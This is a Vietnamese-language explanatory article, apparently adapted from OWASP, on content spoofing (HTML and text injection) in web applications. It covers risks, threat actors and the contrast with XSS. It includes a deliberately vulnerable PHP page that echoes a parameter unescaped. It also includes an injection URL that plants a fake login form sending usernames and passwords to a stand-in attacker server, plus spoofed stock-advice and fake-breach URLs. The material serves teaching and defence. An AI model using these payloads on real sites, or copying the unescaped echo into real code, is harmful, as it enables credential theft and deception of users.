Content Spoofing, còn được gọi là content injection, “chèn văn bản tùy ý” hoặc làm hư mặt ảo, là một cuộc tấn công nhắm mục tiêu vào người dùng có thể thực hiện được bằng lỗ hổng chèn trong ứng dụng web. Khi một ứng dụng không xử lý đúng cách dữ liệu do người dùng cung cấp, kẻ tấn công có thể cung cấp nội dung cho ứng dụng web, thường thông qua một giá trị tham số, được phản ánh lại cho người dùng. Điều này giới thiệu cho người dùng một trang đã sửa đổi trong ngữ cảnh của miền đáng tin cậy. Cuộc tấn công này thường được sử dụng hoặc kết hợp với kỹ thuật xã hội vì cuộc tấn công đang khai thác lỗ hổng dựa trên mã và lòng tin của người dùng. Cần lưu ý thêm, cuộc tấn công này bị nhiều người hiểu nhầm là một loại lỗi không mang lại tác động nào.
Các bài viết liên quan:
Loại tấn công: Phía khách hàng
Các yếu tố rủi ro content Spoofing attack
Các yếu tố rủi ro phụ thuộc vào loại hình kinh doanh của ứng dụng. Nếu thương hiệu kinh doanh ứng dụng nổi tiếng và có các đối thủ cạnh tranh lớn, vấn đề này có thể bị các đối thủ xấu / nhân viên bất mãn / khách hàng không hài lòng lợi dụng để kích hoạt việc phát tán hàng loạt các thông điệp sai đến những khách hàng không nghi ngờ. Một yếu tố khác làm tăng rủi ro là bằng cách thực hiện SEO tiêm theo cách mà các công cụ tìm kiếm thu thập dữ liệu và lập chỉ mục các URL được tạo ra với các thông điệp giả mạo.
Làm như vậy, khách hàng có thể buộc phải chuyển sang sản phẩm của đối thủ cạnh tranh. Điều này có thể dẫn đến mất giá trị tiền tệ cho đến khi việc sửa chữa được thực hiện đúng cách bởi doanh nghiệp nạn nhân. Đối với các công ty giao dịch đại chúng, cổ phiếu của nó sẽ giảm xuống, dẫn đến việc mất hàng triệu USD không thể kiểm soát.
Kịch bản tấn công
Kẻ tấn công đã xâm nhập các tài khoản xã hội có hàng nghìn người theo dõi và phát tán nội dung Content Spoofing gây hiểu lầm thông qua Twitter / Facebook / Instagram / kênh phổ biến tương tự. Điều này sẽ khiến giới truyền thông cho rằng tin tức là đúng và tạo ra những câu chuyện giật tít.
Các ngành áp dụng
Một pháp nhân kinh doanh bán một loại sản phẩm như một chức năng kinh doanh chính
Ví dụ, kinh doanh gọi xe taxi, kinh doanh mua sắm trực tuyến, kinh doanh dịch vụ trực tuyến
Một pháp nhân kinh doanh dựa vào tên thương hiệu
Ví dụ, thương hiệu mỹ phẩm, thương hiệu hàng không
Tác nhân đe dọa
- Đối thủ cạnh tranh độc hại
- Nhân viên không hài lòng
- Khách hàng không hài lòng
- Những kẻ lừa đảo
Content Spoofing so với Cross-site Scripting
Content Spoofing là một cuộc tấn công có liên quan chặt chẽ đến Cross-site Scripting (XSS). Trong khi XSS sử dụng <script> và các kỹ thuật khác để chạy JavaScript, thì nội dung giả mạo sử dụng các kỹ thuật khác để sửa đổi trang vì lý do độc hại.
Ngay cả khi các kỹ thuật giảm thiểu XSS được sử dụng trong ứng dụng web, chẳng hạn như mã hóa đầu ra phù hợp, ứng dụng vẫn có thể dễ bị tấn công Content Spoofing dựa trên văn bản.
Các ví dụ
HTML Injection
Một kịch bản tấn công có thể xảy ra được trình bày dưới đây. Đối với trường hợp này, giả sử rằng không có mã hóa đầu ra nào được triển khai:
- Kẻ tấn công phát hiện ra lỗ hổng bảo mật và quyết định giả mạo biểu mẫu đăng nhập
- Kẻ tấn công tạo ra liên kết độc hại, bao gồm cả nội dung HTML được đưa vào của chúng và gửi nó đến người dùng qua email
- Người dùng truy cập trang do trang nằm trong miền đáng tin cậy
- HTML được chèn của kẻ tấn công được hiển thị và trình bày cho người dùng yêu cầu nhập tên người dùng và mật khẩu
- Người dùng nhập tên người dùng và mật khẩu, cả hai đều được gửi đến máy chủ của kẻ tấn công
Một trang PHP đơn giản có chứa lỗ hổng bảo mật thông qua tham số tên:
<?php
$name = $_REQUEST ['name'];
?>
<html>
<h1>Welcome to the Internet!</h1>
<br>
<body>
Hello, <?php echo $name; ?>!
<p>We are so glad you are here!</p>
</body>
</html>Chức năng của trang có thể được kiểm tra bằng cách thực hiện yêu cầu GET sau đối với trang: http://127.0.0.1/vulnerable.php?name=test
Bằng cách yêu cầu liên kết bên dưới, trang hiển thị HTML được chèn, hiển thị biểu mẫu đăng nhập và nhận xét phần còn lại của trang sau điểm chèn. Sau khi người dùng nhập tên người dùng và mật khẩu của họ, các giá trị được gửi đến một trang có tên login.php trên máy chủ của kẻ tấn công qua POST.
http://127.0.0.1/vulnerable.php?name=<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST" action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password" name="password" /><br /><input type="submit" value="Login" /></form><!--
Chèn văn bản
Một ví dụ khác về cuộc tấn công Content Spoofing là cung cấp thông tin sai cho người dùng thông qua thao tác văn bản. Một kịch bản tấn công được trình bày dưới đây. Đối với trường hợp này, hãy giả sử rằng mã hóa đầu ra phù hợp HAS đã được triển khai và XSS là không thể:
- Kẻ tấn công xác định một ứng dụng web đưa ra khuyến nghị cho người dùng về việc họ nên mua hay bán một cổ phiếu cụ thể
- Kẻ tấn công xác định một tham số dễ bị tấn công
- Kẻ tấn công tạo ra một liên kết độc hại bằng cách sửa đổi một chút yêu cầu hợp lệ
- Liên kết chứa yêu cầu sửa đổi được gửi đến người dùng và họ nhấp vào liên kết
- Một trang web hợp lệ được tạo bằng cách sử dụng đề xuất độc hại của kẻ tấn công và người dùng tin rằng đề xuất đó là từ trang web chứng khoán
Trang hợp lệ
http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Recommend+You+Buy+Now
Trang được sửa đổi
http: //vulnerablesite/suggestions.php? stockid = 123 & stockrecommendation = We + Really + Recommend + You + Sell + This + Stock + Now
Ví dụ khác:
Trang được sửa đổi
http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=Our+site+has+experienced+major+hacking+incident.Please+use+our+competitor+site+http://www.competitor.com+until+we+further+announced+for+update.
